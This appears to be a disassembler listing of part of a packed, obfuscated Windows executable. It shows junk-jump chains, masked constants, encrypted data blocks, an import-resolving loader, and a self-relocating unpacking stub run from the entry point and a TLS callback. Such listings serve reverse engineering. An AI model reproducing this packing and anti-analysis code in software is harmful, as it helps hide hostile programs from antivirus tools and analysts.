dd 0C6035E24h, 0FFCA55E8h, 81EA8BFFh, 607AFEFh, 0E912E94Dh
dd 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_570. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_48CDC1: ; CODE XREF: znnrn47v:0048BEB3j
jmp loc_48879A
; ---------------------------------------------------------------------------
align 4
dd 26B840Fh, 83E90000h, 0FFFFC5h
; ---------------------------------------------------------------------------
locret_48CDD4: ; CODE XREF: znnrn47v:00488281j
retn
; ---------------------------------------------------------------------------
align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_569. PRESS KEYPAD "+" TO EXPAND]
byte_48CDD7 db 87h ; DATA XREF: sub_487FA1:loc_48BAAEo
dd 0BA52241Ch, 48B27Eh, 0FFC3B6E9h, 0E99D00FFh, 0FFFFB411h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488FBC
loc_48CDED: ; CODE XREF: sub_488FBC+3ED2j
jmp nullsub_588
; END OF FUNCTION CHUNK FOR sub_488FBC
; ---------------------------------------------------------------------------
align 4
loc_48CDF4: ; CODE XREF: znnrn47v:0048C95Cj
jmp near ptr dword_487ACC+7Eh
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
; ---------------------------------------------------------------------------
mov word ptr [ecx+0BFFFFC2h], ss
retn 0C4E9h
; ---------------------------------------------------------------------------
db 0BEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48CE08: ; CODE XREF: znnrn47v:loc_48AFDFj
; DATA XREF: znnrn47v:00489465o
mov dl, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_595. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48CA24
loc_48CE0B: ; CODE XREF: sub_48CA24-123Aj
push ecx
push 0B7C964Fh
pop ecx
sub ecx, 374DB11Eh
jmp loc_489D92
; END OF FUNCTION CHUNK FOR sub_48CA24
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A71A
loc_48CE1F: ; CODE XREF: sub_48A71A:loc_488889j
mov byte ptr [ecx], 87h
push 487DD4h
jmp nullsub_586
; END OF FUNCTION CHUNK FOR sub_48A71A
; ---------------------------------------------------------------------------
dd 0E9C22B00h, 0FFFFB53Eh, 0AFC86800h, 0CAE90048h, 8BFFFFD2h
dd 1C8759D9h, 5BEB8B24h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48AE05
loc_48CE4B: ; CODE XREF: sub_48AE05+Bj
jmp loc_48C9DF
; END OF FUNCTION CHUNK FOR sub_48AE05
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48CE52: ; CODE XREF: znnrn47v:loc_48AE1Ej
mov byte ptr [ebx], 0FFh
pop ebx
mov dword ptr [ebp-14h], 516C6175h
mov dword ptr [ebp-10h], 79726575h
jmp loc_48AF59
; ---------------------------------------------------------------------------
align 2
popf
jmp sub_48930E
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488FBC
loc_48CE71: ; CODE XREF: sub_488FBC+Cj
sub eax, 0FC8C82D0h
or eax, 0D9021140h
xor eax, 242E959Bh
add eax, 9B6868h
push offset byte_48C8CD
jmp loc_48CDED
; END OF FUNCTION CHUNK FOR sub_488FBC
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
locret_48CE95: ; CODE XREF: znnrn47v:00488C0Fj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_48CE96: ; CODE XREF: sub_48D039-28F5j
jmp loc_488D67
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
jmp sub_48A71A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488549
loc_48CEA0: ; CODE XREF: sub_488549+3E1Dj
jge loc_488987
loc_48CEA6: ; CODE XREF: znnrn47v:0048C049j
jmp nullsub_612
; END OF FUNCTION CHUNK FOR sub_488549
; ---------------------------------------------------------------------------
align 4
loc_48CEAC: ; CODE XREF: znnrn47v:0048B6CBj
jmp locret_48A0D6
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B5EC
loc_48CEB3: ; CODE XREF: sub_48B5EC+18j
jmp nullsub_613
; END OF FUNCTION CHUNK FOR sub_48B5EC
; ---------------------------------------------------------------------------
dd 0FFB084E9h, 0BE0000FFh, 60A02AE5h, 0FFB059E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_488955
loc_48CECA: ; CODE XREF: sub_488955:loc_48AF71j
sub edi, 596E7969h
add edi, 0C8CF0A30h
xor edi, 0AD1D9472h
loc_48CEDC: ; DATA XREF: znnrn47v:0048ADA9o
add edi, ebp
add edi, 59320D46h
mov [edi], eax
jmp loc_48A4FF
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
align 4
dd 0E9C62B00h, 0FFFFF3ECh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48AADF
loc_48CEF6: ; CODE XREF: sub_48AADF+1Aj
rol edx, 4
add edx, 78A034E4h
popf
push offset loc_48CAFE
jmp nullsub_599
; END OF FUNCTION CHUNK FOR sub_48AADF
; ---------------------------------------------------------------------------
loc_48CF0A: ; CODE XREF: znnrn47v:0048B017j
; DATA XREF: znnrn47v:0048BB55o
xchg edi, [esp]
jnz loc_48A8BF
call sub_4880A0
add bl, al
add al, ch
add eax, 0FFFFD0h
jmp loc_48D087
; ---------------------------------------------------------------------------
dw 8100h
dd 0F339AEC7h, 3CFB9DE1h, 689C5324h, 8CD52C33h, 0FFD070E9h
dd 8A0F00FFh, 0FFFFF416h, 0FFBD33E9h, 0C8700FFh, 0F1685924h
dd 5A0C52ECh, 4678F281h, 0C2818212h, 71BF557Bh, 48C55968h
dd 0D2DAE900h
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_48CF6A proc near ; CODE XREF: znnrn47v:0048CBA3p
xchg edx, [esp+0]
pop edx
add eax, ebp
add eax, 8D4E58Ah
popf
jmp near ptr dword_48AE40+0Dh
sub_48CF6A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0F022800Fh, 9FE9FFFFh
; ---------------------------------------------------------------------------
sar edi, 0FFh
locret_48CF87: ; CODE XREF: znnrn47v:loc_488FDFj
retn
; ---------------------------------------------------------------------------
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_597. PRESS KEYPAD "+" TO EXPAND]
align 4
; START OF FUNCTION CHUNK FOR sub_48A0DE
loc_48CF8C: ; CODE XREF: sub_48A0DE+Aj
jmp near ptr dword_488854+12h
; END OF FUNCTION CHUNK FOR sub_48A0DE
; ---------------------------------------------------------------------------
align 2
dw 0C87h
dd 0F2815924h, 0CE114E45h
dword_48CF9C dd 8B5AC215h, 0FC00900h, 0FFBB1384h, 0E89BE9FFh, 0E681FFFFh
; DATA XREF: znnrn47v:00489B32o
dd 0A492083Fh, 0FFFFD9E9h, 0CA8100FFh, 0DCB374FDh, 0FFEB05E9h
db 0FFh, 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_588. PRESS KEYPAD "+" TO EXPAND]
dd 24148700h
db 8Bh, 0CAh, 5Ah
byte_48CFCF db 58h ; DATA XREF: znnrn47v:0048CBD3o
dd 0E98B240Ch, 0FFF172E9h, 0C3FFh, 864DA768h, 24148730h
dd 815ACA8Bh, 8DA339C1h, 0F6B5E89Eh, 0FFFFh
; ---------------------------------------------------------------------------
loc_48CFF4: ; CODE XREF: znnrn47v:0048A11Dj
jmp near ptr dword_487CA0+37h
; ---------------------------------------------------------------------------
db 0E9h, 22h, 0F0h
dd 0E951FFFFh, 0FFFFAE73h
db 0
; ---------------------------------------------------------------------------
loc_48D005: ; CODE XREF: znnrn47v:0048B036j
; znnrn47v:0048B051j
rol eax, 7
and eax, 304B3BC6h
add eax, 4Ch
push edi
jmp near ptr dword_48A77C+13h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_584. PRESS KEYPAD "+" TO EXPAND]
db 0E9h
dd 0FFFFC151h
db 0
; ---------------------------------------------------------------------------
loc_48D021: ; CODE XREF: znnrn47v:00489931j
xor esi, 8D364F35h
xchg edx, [esp]
pop edx
push ecx
mov ecx, offset loc_48BB16
jmp loc_48C89C
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48D037: ; CODE XREF: znnrn47v:0048A062j
adc eax, ebp
; =============== S U B R O U T I N E =======================================
sub_48D039 proc near ; CODE XREF: znnrn47v:0048C393p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004882A2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00488344 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00488D67 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00489834 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048A528 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A729 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0048B3B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048C576 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C9FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CE96 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push edx
jmp loc_48A729
sub_48D039 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_583. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48D046: ; CODE XREF: znnrn47v:00488E41j
jmp loc_489C71
; ---------------------------------------------------------------------------
db 13h
dd 0D4CDE9F9h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_48D053: ; CODE XREF: znnrn47v:0048B38Aj
js near ptr loc_48954F+1
loc_48D059: ; CODE XREF: znnrn47v:00489C9Cp
call sub_48961B
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
locret_48D060: ; CODE XREF: znnrn47v:loc_489FF3j
retn
; ---------------------------------------------------------------------------
align 2
dw 2C6h
dd 0CCE85A8Bh, 0FFFFC8h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488669
loc_48D06D: ; CODE XREF: sub_488669+33D5j
jmp nullsub_579
; END OF FUNCTION CHUNK FOR sub_488669
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48D077: ; CODE XREF: znnrn47v:00489D2Fj
jmp locret_48B40D
; ---------------------------------------------------------------------------
dd 0FFFEA6E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_48930E
loc_48D082: ; CODE XREF: sub_48930E+1Dj
jmp loc_489C8D
; END OF FUNCTION CHUNK FOR sub_48930E
; ---------------------------------------------------------------------------
loc_48D087: ; CODE XREF: znnrn47v:0048CF21j
jb loc_489F61
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFB35Eh, 0FFE266E9h, 0E90000FFh, 0FFFFCC27h, 599B800h
dd 0B0E93D8Fh, 0FFFFCEh
; ---------------------------------------------------------------------------
locret_48D0AC: ; CODE XREF: znnrn47v:0048ACD1j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48D0AF: ; CODE XREF: sub_48B1BE+CCEj
jmp nullsub_596
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
loc_48D0B4: ; CODE XREF: znnrn47v:004888F1j
jmp loc_48BDA7
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488B8D
loc_48D0BB: ; CODE XREF: sub_488B8D+379Dj
push offset dword_489D18
jmp nullsub_578
; END OF FUNCTION CHUNK FOR sub_488B8D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48D0C5: ; CODE XREF: sub_488955+25EFj
test ebx, ebp
jmp loc_48AEE1
; END OF FUNCTION CHUNK FOR sub_488955
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_567. PRESS KEYPAD "+" TO EXPAND]
align 2
dw 30B8h
dd 0E90048C5h, 0FFFFEB42h, 34E9CE33h, 0FFFFCAh, 0C300h
; ---------------------------------------------------------------------------
loc_48D0E4: ; CODE XREF: znnrn47v:0048B0CEj
jmp loc_488D01
; ---------------------------------------------------------------------------
loc_48D0E9: ; CODE XREF: znnrn47v:0048966Bj
jmp near ptr unk_488409
; ---------------------------------------------------------------------------
or ebx, eax
jmp sub_48BDC9
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D0F6 proc near ; CODE XREF: znnrn47v:loc_48994Cp
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0048D24A SIZE 0000000B BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push esi
push edi
push ebx
mov esi, offset dword_438000
mov eax, 400000h
mov [ebp+var_4], eax
mov edx, eax
loc_48D10E: ; CODE XREF: sub_48D0F6+15Aj
mov eax, [esi+0Ch]
or eax, eax
jz loc_48D1A5
add eax, edx
mov ebx, eax
push eax
call ds:dword_45B0B4 ; GetModuleHandleA
or eax, eax
jnz loc_48D13B
push ebx
call ds:dword_45B0B8 ; LoadLibraryA
or eax, eax
jz loc_48D19D
loc_48D13B: ; CODE XREF: sub_48D0F6+30j
mov [ebp+var_8], eax
push 0
pop [ebp+var_C]
loc_48D143: ; CODE XREF: sub_48D0F6+A2j
mov eax, [esi]
or eax, eax
mov edx, [ebp+var_4]
jnz loc_48D153
mov eax, [esi+10h]
loc_48D153: ; CODE XREF: sub_48D0F6+54j
add eax, edx
add eax, [ebp+var_C]
mov ebx, [eax]
mov edi, [esi+10h]
add edi, edx
add edi, [ebp+var_C]
or ebx, ebx
jz loc_48D24A
test ebx, 80000000h
jnz loc_48D17A
lea ebx, [ebx+edx+2]
loc_48D17A: ; CODE XREF: sub_48D0F6+7Aj
and ebx, 7FFFFFFFh
push ebx
push [ebp+var_8]
call ds:dword_45B0BC ; GetProcAddress
or eax, eax
jz loc_48D19D
mov [edi], eax
add [ebp+var_C], 4
jmp loc_48D143
; ---------------------------------------------------------------------------
loc_48D19D: ; CODE XREF: sub_48D0F6+3Fj
; sub_48D0F6+96j
push ebx
mov eax, ebx
call sub_48D1AC
loc_48D1A5: ; CODE XREF: sub_48D0F6+1Dj
pop ebx
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_48D0F6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D1AC proc near ; CODE XREF: sub_48D0F6+AAp
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
mov [ebp+var_104], eax
mov [ebp+var_100], 276E6143h
mov [ebp+var_FC], 6F6C2074h
mov [ebp+var_F8], 206461h
mov [ebp+var_108], 0Bh
loc_48D1E3: ; CODE XREF: sub_48D1AC+99j
mov eax, [ebp+var_104]
cmp byte ptr [eax], 0
jnz loc_48D224
mov eax, [ebp+var_108]
mov byte ptr [ebp+eax+var_100], 0
push 2010h
push 0
lea eax, [ebp+var_100]
push eax
push 0
call ds:dword_45B104 ; MessageBoxA
push 0FFFFFFFFh
call ds:dword_45B0C0 ; ExitProcess
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
loc_48D224: ; CODE XREF: sub_48D1AC+40j
mov eax, [ebp+var_108]
mov edx, [ebp+var_104]
mov dl, [edx]
loc_48D232: ; CODE XREF: znnrn47v:0048921Cj
mov byte ptr [ebp+eax+var_100], dl
inc [ebp+var_108]
inc [ebp+var_104]
jmp loc_48D1E3
sub_48D1AC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D0F6
loc_48D24A: ; CODE XREF: sub_48D0F6+6Ej
add esi, 14h
mov edx, [ebp+var_4]
jmp loc_48D10E
; END OF FUNCTION CHUNK FOR sub_48D0F6
; ---------------------------------------------------------------------------
align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_589. PRESS KEYPAD "+" TO EXPAND]
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_48D259 proc near ; CODE XREF: startp TlsCallback_0p
mov eax, offset word_487A46
locret_48D25E: ; DATA XREF: znnrn47v:0048D267o
retn
sub_48D259 endp
; ---------------------------------------------------------------------------
push esi
push edi
push ecx
push ebx
push eax
mov ebx, [esp]
sub ebx, offset locret_48D25E
mov eax, 4496h
push eax
push 4
push 1000h
push eax
push 0
mov eax, offset dword_45B0C4
mov eax, [eax+ebx]
call eax
pop ecx
mov edx, offset word_487A46
add edx, ebx
push edx
push ebx
push eax
mov edi, eax
mov esi, edx
cld
rep movsb
mov ecx, offset sub_4878C2
add ecx, ebx
call ecx
pop eax
mov ebx, [esp]
push 8000h
push 0
push eax
mov eax, 45B0C8h
mov eax, [eax+ebx]
call eax
pop ecx
pop eax
pop ebx
sub ebx, 5
mov byte ptr [ebx], 0B8h
inc ebx
mov [ebx], eax
add ebx, 4
mov byte ptr [ebx], 0C3h
or ecx, ecx
jz short loc_48D314
mov ebx, eax
call loc_48D375
cld
lodsd
cmp eax, 0FFFFFFFFh
jz short loc_48D314
push ebx
mov ebx, ecx
loc_48D2DF: ; CODE XREF: znnrn47v:0048D2F0j
; znnrn47v:0048D303j ...
add ebx, eax
add [ebx], ecx
add ebx, 4
lodsb
cmp al, 0FEh
jnb short loc_48D2F2
and eax, 0FFh
jmp short loc_48D2DF
; ---------------------------------------------------------------------------
loc_48D2F2: ; CODE XREF: znnrn47v:0048D2E9j
add ebx, 0FEh
or eax, eax
jp short loc_48D305
lodsw
and eax, 0FFFFh
jmp short loc_48D2DF
; ---------------------------------------------------------------------------
loc_48D305: ; CODE XREF: znnrn47v:0048D2FAj
lodsd
dec esi
and eax, 0FFFFFFh
cmp eax, 0FFFFFFh
jnz short loc_48D2DF
pop eax
loc_48D314: ; CODE XREF: znnrn47v:0048D2CCj
; znnrn47v:0048D2DAj
pop ebx
pop ecx
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
db 0C9h, 0Ah, 0Fh
dd 57BEC0B7h, 7B3B427Ch, 2E01D187h, 1CF4BD13h, 0EBB33A0h
dd 0F9A0CBEEh, 446C97C7h, 0FFB252Fh, 0A7B680BFh, 9612FFC2h
dd 0DA2512h, 0A9B9D23Ah, 3B596413h, 9A0E2C4Fh, 10143B33h
dd 40A049D1h
; ---------------------------------------------------------------------------
cwde
; =============== S U B R O U T I N E =======================================
public start
start proc near
call sub_48D259
add eax, 1174h
jmp eax
start endp
; =============== S U B R O U T I N E =======================================
public TlsCallback_0
TlsCallback_0 proc near ; DATA XREF: znnrn47v:TlsCallbackso
call sub_48D259
add eax, 16Bh
jmp eax
TlsCallback_0 endp
; ---------------------------------------------------------------------------
loc_48D375: ; CODE XREF: znnrn47v:0048D2D0p
call sub_48D37E
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_48D37E proc near ; CODE XREF: znnrn47v:loc_48D375p
pop esi
retn
sub_48D37E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0A336CC00h, 40AF2BC5h, 474A3443h, 0BF1E6C80h, 0CF017FC7h
dd 170CB720h, 91D1BAB9h, 40C2F748h, 0CB45D160h, 0B57CC6A8h
dd 78755197h, 70E70F2Fh, 0AA74A37Bh, 0F9A30540h, 0EC945408h
dd 29DE12C6h, 3C49983Dh, 3D603B3Ah, 0DD08D9DAh, 0ACE5D6F2h
dd 3A93BDE9h, 0E8C0378Bh, 366084h, 272D90DCh, 0B2D180FCh
dd 0E986065Fh, 432D4854h, 0FE63F74h, 0E54ACB2Ah, 7A2C3B26h
dd 0FF78553h, 782153DBh, 5Ch dup(0)
db 0
byte_48D571 db 3 dup(0) ; DATA XREF: sub_48A5BC+452o
align 1000h
znnrn47v ends
; Section 8. (virtual address 0008E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0008E000
; Flags 40000080: Bss Readable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read
tdbkm0a1 segment para public 'BSS' use32
assume cs:tdbkm0a1
;org 48E000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 0C2C70EABh, 0BED10F46h, 0A0F27E04h, 47D0815Ah, 2219D08h
dd 1F3A1872h, 93D0406h, 0A7FA39B5h, 0B964526Dh, 0AEA8683Fh
dd 0EB492DB3h, 87197EA9h, 0D9D81835h, 38C40393h, 1EB4466Bh
dd 92DDEC6Dh, 0F7761A6Fh, 2592E876h, 9832405Eh, 144D209Eh
dd 0C01BEE39h, 0BE375102h, 9E901093h, 8262AA53h, 1928E33Eh
dd 3C28E0EFh, 3DAADEA1h, 7E62EFDEh, 0BD1B3E60h, 96E7B55Ch
dd 0E05B0161h, 78F20F47h, 4E72F544h, 0DA1A5C53h, 40B5C823h
dd 3EF1156Eh, 45B2A5D0h, 609D3208h, 616BAD01h, 0D9D7F918h
dd 28C0FE2Bh, 0B49D7B04h, 1FA4EFDFh, 927DEDE2h, 4F18D8DAh
dd 0CE3B1D2Ah, 95AC5FF5h, 0D82832B8h, 3F0473Ch, 32444512h
dd 2DFB0F16h, 175C3890h, 6D4AEA2Fh, 0D4A0009Ah, 9EB1474h
dd 5C18ED4Ch, 0ADAFC6Eh, 0C995CC98h, 0BC41F25Ch, 0B0F825B2h
dd 0F2D06CDBh, 65F93B27h, 5D4233FEh, 0BD3D0D07h, 85AC3596h
dd 0D0B386FFh, 3F7E1C00h, 0E007E52Eh, 56C2C40Ah, 9F3EBF9Ch
dd 0EC58819h, 0A946B0B7h, 8F250804h, 0ECEA2D9Ch, 0E627B38Fh
dd 32C19375h, 15EA25E1h, 0AC8059A9h, 87368E12h, 0CA2FAAF8h
dd 53D66355h, 0C3F84E1Bh, 0FB198164h, 4B75E65h, 0ED899CE9h
dd 3C986100h, 0A1B3B061h, 7B713BDFh, 5A00B478h, 828ED084h
dd 2556F78Dh, 0BA3C9F10h, 74E49F09h, 93568F1h, 0AFA9292Dh
dd 0D2A64A51h, 31CD9431h, 987B1FB0h, 13267702h, 6F9637B2h
dd 78A5B196h, 3B2C432Dh, 0C808CB30h, 9ED8B127h, 201A3A26h
dd 225621C7h, 5DF849E8h, 71974ACEh, 0D8B8E8B0h, 0B2DE7506h
dd 0E4B9488Fh, 7267862Ah, 0D2D95A32h, 0DD2A906Fh, 1D1250B3h
dd 1B369980h, 7FB079C3h, 7E045857h, 62C31438h, 0D3B508FFh
dd 6444B07h, 0BCED235h, 8114A299h, 5CC88F94h, 1BAE4985h
dd 739635A2h, 980A40C3h, 0EC8257D4h, 0B988C450h, 0D2E020E7h
dd 0B9139D33h, 9D6DE355h, 236CEFB6h, 211DB5D1h, 66D5B0C7h
dd 19080D0Dh, 0E838F91Fh, 5505D191h, 5A971FBBh, 0E2D67121h
dd 0D56E304Ah, 86B4B73Bh, 0BD8A1D85h, 9CCE92A2h, 0F446B208h
dd 1AD80D90h, 9402E9F2h, 7BF74F0Eh, 23007E49h, 0E5B14C49h
dd 83186EB5h, 0D86F7B32h, 0F98777AEh, 16FD79E5h, 3D828h
dd 0ECBAADA4h, 0ED32BA10h, 132ADB54h, 7134B45Dh, 0DD5C2E92h
dd 84553288h, 0BC82435Fh, 0BAA87553h, 3F4F948Eh, 65B8B526h
dd 0EF891A52h, 5FB15756h, 4A1DCC7h, 0D25970C4h, 0CED1EB52h
dd 1F8DC1DEh, 82A902D4h, 4019B6C6h, 75EF1903h, 11B6FC86h
dd 311E197Dh, 716B64BFh, 77EF89C4h, 68F94D51h, 908FBD46h
dd 464503B6h, 9DCED08Bh, 0F9D854FCh, 0AC663985h, 50DA94D2h
dd 1CE50816h, 0C89689EAh, 4045A86Ah, 731660B8h, 0C3C940BAh
dd 82CFD381h, 0C8E94E1Ah, 8C1FC6E6h, 3649C5FFh, 0C29882F6h
dd 2748150h, 7EEEF154h, 747E759Fh, 6220EA85h, 0BA0237A5h
dd 3E31F54Ch, 516CC011h, 5D66472Fh, 191E1B5Bh, 83647237h
dd 1B4D351Fh, 66E60E73h, 0E60706A2h, 0DCCC8289h, 0E5254082h
dd 7948E0ADh, 75CE9BF9h, 93A871E7h, 7A57F6BCh, 0BC6A99EEh
dd 0AA6BF3BFh, 716C7168h, 7FB89C03h, 0E5C36BDFh, 8FFA6EF5h
dd 780D804Ah, 89A15F28h, 0B3308009h, 0F17D2802h, 70457C38h
dd 3C1B0857h, 0EFB019B5h, 0D5E401E0h, 524D284Bh, 136C28C6h
dd 28131BB6h, 2A4C0D7Eh, 681733DFh, 420C49E5h, 0F3484B0Fh
dd 0BB68FE0Eh, 77FD1777h, 0B7209826h, 7065C3DEh, 0BF085183h
dd 0A3291530h, 0E115D304h, 63A171C2h, 4D2ECAE5h, 32886CC4h
dd 833C2C02h, 3B76516Eh, 5E5B33A3h, 79588AE2h, 0EE8310FCh
dd 12553882h, 9DB08CD6h, 15466D4h, 49753A29h, 5BB88E78h
dd 74A4B722h, 0DB1A27CFh, 3E522D89h, 0FC679B32h, 0AC1A3446h
dd 0E45060A2h, 897D656h, 0A8567208h, 0EFFDEDA4h, 73926530h
dd 648DCA72h, 0C68BE27Ah, 105B2316h, 0A7595B53h, 0D4CCE92Fh
dd 0CCEBEC4Fh, 0BD3225CEh, 26089A29h, 818E954Ch, 3F65F53h
dd 0B20480A0h, 0E6F46Eh, 988FD46Ah, 2C5864BCh, 0CAFF100Bh
dd 5B9A196Fh, 0FDC3FB22h, 3FDA1CB7h, 318AB544h, 691AA8CFh
dd 27E9AFBBh, 6D8D5925h, 85BB08Fh, 585C30E7h, 0C485302Ch
dd 16305FD0h, 0C7710F3Ah, 3F53BFD6h, 0DDA88468h, 19396E0Dh
dd 0E64C9E37h, 1EF65979h, 18E2BD07h, 46AAE5F0h, 4E4F0427h
dd 5A36B143h, 11F5CAABh, 1D147FB1h, 0E3DD86C3h, 0B1754A74h
dd 80BC0C73h, 0E6418033h, 4809DF3Eh, 1637B80Ah, 17D5289Ah
dd 0E65DDD02h, 71A35A47h, 27B7A972h, 0DB68D190h, 0CBC77E94h
dd 0B699ECADh, 804FC6B4h, 41057DBFh, 684AE37Ch, 593E0625h
dd 2094851Dh, 8B486AEAh, 218E7F8Bh, 0CC8BF0D3h, 0D7407500h
dd 7799E0D9h, 6093477Eh, 85AB4B92h, 0BA64AD22h, 0E86E294Bh
dd 0FDA9EDCh, 2B768D41h, 3C87C713h, 0D444E156h, 501C74A1h
dd 8F22D697h, 415F046Bh, 968B63C2h, 60EDBA3Bh, 947A7ABBh
dd 8B9CC310h, 16FC7A5Eh, 0E5225323h, 0D510DDD4h, 0BE1157E0h
dd 5B1B3DE0h, 8577EDEFh, 8D5B93Ch, 867C2617h, 4C959C84h
dd 0AE3365C2h, 67BC20C8h, 1E7CCC90h, 44F7ADE3h, 0E953A1BDh
dd 0A4F34BD9h, 0C5932C01h, 75D308A2h, 0DA1516E4h, 0BD38856h
dd 0D0918568h, 0E4DC5CAh, 78416681h, 1C373BFAh, 5D6F9E81h
dd 90A25C74h, 0C0DE9415h, 0BF4CF15Dh, 56D06E59h, 0BEAC25E0h
dd 0D35BE530h, 0D3DF29BCh, 5F4BDE8Ch, 0A9A25F6Bh, 0D7985A87h
dd 0A11D8599h, 718EA413h, 0D44BA14Ah, 0EBE9058Ah, 767612C7h
dd 0DA0695B7h, 0A2932A63h, 401FC25Eh, 81655625h, 5336CE21h
dd 0A353CA6Ah, 528A7480h, 54B647B8h, 56CA109Ch, 0DD0AC18Fh
dd 163C975Bh, 4B8D5677h, 3ECC5958h, 0A983A566h, 0C244D3Fh
dd 69559B33h, 1A76373h, 0F32B4801h, 6BD7827Eh, 96638B6h
dd 0F13F8BC4h, 0F981E67Ch, 20B3C4B7h, 4EBE4068h, 0F6AC7EDCh
dd 62D15F5h, 0FF8FEB2Ah, 8084FB3Ah, 0A09A8874h, 0DB1A8D84h
dd 827155B9h, 66F0BA70h, 0D1913A46h, 0BCE4B844h, 0FC6074B7h
dd 0E73F9CBCh, 5AF16C84h, 23978EC0h, 0D8325C31h, 0D10B84C6h
dd 5D1140FEh, 24360C8Fh, 0B684933Dh, 0D3068244h, 9A1B7F6Fh
dd 46CE2FF5h, 73DC3606h, 655534D1h, 759063DAh, 87EE14C4h
dd 4B488BB6h, 65D5C6E1h, 0F58EFF57h, 8F6D2AF8h, 0D2A96DE3h
dd 555A9C24h, 5E28128Ch, 48001974h, 1CA9829Ah, 1C55CBBDh
dd 0D1E9B5DFh, 6D58AB42h, 59A46826h, 9EC66D60h, 0A3EB4E96h
dd 0EBBAB10h, 0AB0B63ACh, 6783A988h, 876A9485h, 0DDB47069h
dd 6D3A7E8h, 0AE39C037h, 0C8FFC429h, 7BC6E0B1h, 0F6BB2ABh
